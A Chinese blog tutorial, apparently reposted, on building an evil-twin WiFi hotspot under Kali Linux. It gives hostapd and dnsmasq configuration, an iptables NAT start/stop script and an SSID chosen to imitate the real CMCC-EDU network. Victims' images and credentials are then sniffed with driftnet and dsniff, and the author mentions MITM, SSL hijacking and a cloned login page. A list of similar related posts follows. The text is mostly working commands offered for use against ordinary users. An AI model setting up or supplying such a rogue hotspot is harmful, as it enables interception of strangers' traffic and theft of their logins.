kali下搭建WiFi钓鱼热点
在linux下建立无线热点并不像在windows下开启网络共享或者使用无线网卡驱动设置AP模式即可。
linux下的无线共享要用到两个软件:hostapd(创建无线热点)、dnsmasq(dns服务和dhcp服务).
1.安装以上两个软件:
apt-get install hostapd
apt-get install dnsmasq
2.配置hostapd.conf文件
很多教程上说配置/etc/hostapd/hostapd.conf文件,但是初次配置时,在/etc/hostapd/下并没有发现这个文件。
好吧,用linux的强大查找功能吧:
# find -name hostapd
靠,没有。这个可以有!赶紧google一下,在网上可以直接找到hostapd.conf文件,如果直接copy下来放到/etc/hostapd/来可能版本不同不兼容。
想了想,应该在/etc/(毕竟是个配置文件),在到/etc/下找找吧:
/etc# find -name hostapd发现以下文件:./default/hostapd./init.d/hostapd./hostapd./network/if-post-down.d/hostapd./network/if-pre-up.d/hostapd
进去看看:
在该文件中发现了hpstapd.conf.gz文件,它 的位置是/usr/share/doc/hostapd/examples/
好吧,应该找到了,只是压缩了,解压吧。注意还要修改上图的文件,将#DAEMON_CONF=“”修改成上图形式的(我的已经修改好了)。
DAEMON_CONF=/etc/hostapd/hostapd.conf
保存并退出,将 hpstapd.conf.gz复制到/etc/hostapd/下:
# cp /usr/share/doc/hostapd/examples/hostapd.conf.gz /etc/hostapd/
进入/etc/hostapd/目录下,解压:
/etc/hostapd# gzip -d hostapd.conf.gz > hostapd.conf
现在可以编辑hostapd.conf文件了:
# cd /etc/hostapd
/etc/hostapd# vim ./hostapd.conf
去掉前面的注释(去‘#’),并修改以下的:
interface=wlan2 //设置要做为AP的网卡
driver=nl80211 //设置无线网卡驱动,一般都是这样(也可以具体的,如rtl871xdrv)
ssid=CMCC-EDU //设置热点的名称,CMCC-EDU你总该连吧~
hw_mode=g //(默认)无线模式,这里是默认的
channel=6 //无线频道(1、6、11三个频道互补干扰)
macaddr_acl=0 //(默认)MAC地址过滤规则,设置为0即有规则的话就启用
auth_algs=1 //设置为开放无线模式
其他的默认就好,当然你也可以仔细研究这个hostapd.conf文件(如果你的E文好的话...),最后会说说支持WPA加密的设置。
接下来,是配置dnsmasq.conf文件:
vim /etc/dnsmasq.conf
修改为如下图形式:
设置内核支持IP转发,编辑/etc/sysctl.conf文件,去掉“# net.ipv4.ip_forward=1”前面的#去掉:
现在就可以启动我们设置好的伪造热点了,这里直接写成了一个脚本:
#! /bin/bashcase $1 in"start")sleep 1ifconfig wlan2 192.168.10.1 netmask 255.255.255.0 //无线热点的接口wlan2sleep 1echo "1" >/proc/sys/net/ipv4/ip_forwardsleep 1iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE //这里我上网的网卡是wlan0,如果是网线的话就是eth0sleep 1/etc/init.d/hostapd startsleep 1/etc/init.d/dnsmasq start;;"stop")/etc/init.d/dnsmasq stop/etc/init.d/hostapd stopsleep 1iptables -t nat -D POSTROUTING -o wlan0 -j MASQUERADE //同上sleep 1echo "0" >/proc/sys/net/ipv4/ip_forwardsleep 1;;*)echo "Usage $0 {start|stop}";;esac
取个名字AP-wlan0,再给它加个可运行权限,并放到/etc/init.d/下:
chmod +x ./AP-wlan0
cp ./AP-wlan0 /etc/init.d
启动服务脚本:
service AP-wlan0 start
启动之后,如图():
好了,手机连接上试试~~
由于我这有CMCC-EDU的无线信号,为了便于区分,我把伪造的热点改为CMCC-EDUU,
用driftnet抓去网页图片看看:
driftnet -i wlan2
效果很明显哦^_^,driftnet还可以捕获音频的哦,详细去看说明吧
当然,这个时候打开dsniff和wireshark的话,所有的数据都可以抓下来了,中间人攻击、ssl等各种劫持都可以哦,这个我也在研究。。。
dsniff指定端口嗅探:
dsniff -i wlan2 -t 21/tcp=ftp,80/tcp=http
由于我这里在克隆CMCC-EDU登录界面时,它做的有点变态,还得修改点,所以暂时先写到这了
PS:下一步就该轮到我的树莓派上场了,亲看下回分解`_`
补充的:
配置hostapd.conf文件支持WPA加密:
interface=wlan2 driver=nl80211 ssid=mywifi hw_mode=g channel=6 macaddr_acl=0 auth_algs=1 ignore_broadcast_ssid=0 ieee80211n=1 wpa=2 //WPA2加密模式 wpa_passphrase=mimanicai //密码(即wifi密码) wpa_key_mgmt=WPA-PSK wpa-pairwise=TKIP rns-pairwise=CCMP//其他的默认,kali默认用vim时是没有高亮显示的,建议设置成高亮的以便于查找,怎么设,自己google吧
转载于:https://www.cnblogs.com/lingerhk/p/3755583.html
kali下搭建WiFi钓鱼热点相关推荐
- kali下搭建WiFi钓鱼热点
在linux下建立无线热点并不像在windows下开启网络共享或者使用无线网卡驱动设置AP模式即可. linux下的无线共享要用到两个软件:hostapd(创建无线热点).dnsmasq(dns服务和 ...
- Linux系统搭建钓鱼WIFI教程,kali下搭建WiFi钓鱼热点 | 独木の白帆
在linux下建立无线热点并不像在windows下开启网络共享或者使用无线网卡驱动设置AP模式即可. linux下的无线共享要用到两个软件:hostapd(创建无线热点).dnsmasq(dns服务和 ...
- Windows下用某品牌随身WiFi搭建一个钓鱼热点
*本文原创作者:Leslie___Cheung ,本文属于原创博客,未经许可禁止转载. *本文内容仅代表作者观点且只做测试展示,目的是提醒读者注意 WiFi 联网安全,严禁将内容用于不法用途. 目录 ...
- Kali linux搭建wifi绵羊墙
本篇文章是在前人的基础上完成的,之前查了几篇wifi绵羊墙的搭建,但是参照任何一篇搭建出来都或多或少的存在一些问题,可能是我Kali系统跟别人的不一样.探索了大概一个礼拜的时间,实现了嗅探获取周围环境 ...
- ubuntu 14.04搭建wifi分享热点总结
首先你要下载一个hotspot软件,通过网上制定的地址通常会提示你无法找到该地址,现在我说一下我再搭建改环境的时候的解决方法以及如何搭建成功; ubuntu14.04安装配置无线ap 1.添加含有ap ...
- kali下进行wifi干扰
首先启动混杂模式 ifconfig查看interface airmon-ng start wlan0 Found 5 processes that could cause trouble. If ai ...
- 关于使用window10创建热点 wifi钓鱼的方法
不久前折腾了一波,但是我在想,不做笔记,等于人生白活,什么都没留下,所以不管简单不简单,能笔记的还是笔记下,代表我曾经会这个东西.. 需要的硬件设备 window10笔记本一台 无线网络或网线上网.. ...
- kali 创建php可执行文件_利用树莓派在kali环境下搭建Web环境(Apache+Php7.3+Mysql)...
前言 在kali下我们来搭建web系统环境,在平时我们可在win系列的系统上用Phpstudys等集成环境来搭建,快捷 方便.今天来看看如何在kali下搭建环境.此中安装方法也适应Debian系列的系 ...
- 渗透测试之地基服务篇:无线攻防之Kali自搭建钓鱼Wifi
简介 渗透测试-地基篇 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西. 请注意 : 本文仅用于技术讨论与研究,对于所有 ...
最新文章
- 皮一皮:这婚还结不结...
- oracle 查看任务数量,关于dbms_scheduler创建任务数量的疑问
- C# 实现SQLServer数据库备份示例
- int定义源码 python_python学习(第一章)
- 分布式系统的工程化开发方法
- xp彻底删除mysql_xp彻底清除mysql数据库
- win7 配置jdk
- ==和Equal()
- 51单片机语音跳绳计播报跳绳数目
- 全国地表径流量数据获取/植被类型数据/NPP数据/土壤侵蚀数据/土壤质地分类/降雨量栅格数据/太阳辐射量数据
- 计算机专业科研经费排名2015,2017中国大学科研经费排名
- thinkphp下载MP4视频
- 计算机图形学透视投影知识点,计算机图形学
- Linux面试最高频的5个基本问题
- Excel 上传和下载
- 达人评测 酷睿i7 1195g7 和奔腾n6000选哪个
- python变量值发生变化时输出语句_有一个字符串变量s = 'python program',语句print(s[1:5:2]) 的输出结果是:_学小易找答案...
- android 记事簿源码,安卓记事本源代码,详细。
- 如何利用github搭建个人主页网站?
- C++自创打怪小游戏1.1.21023.425
热门文章
- br php 配置,无法载入 mcrypt 扩展,br /请检查 PHP 配置终极解决方案
- 现代分类方法在医学诊断中的应用——基于R的实现
- 鸿蒙系统可以安装teams吗,鸿蒙致命弱点被曝光!不能装这个软件,80%用户将望而却步!...
- OSError: [WinError 126] 找不到指定的模块。【专治疑难杂症】
- C语言:编写一个程序,求s=1+(1+2)+(1+2+3)+....+(1+2+3+....+n)的值。
- byte,int,char的区别
- scala数组与java数组对比
- 剑指offer第七天
- 常用实例:js格式化手机号为3 4 4形式
- 九度 题目1394:五连击数组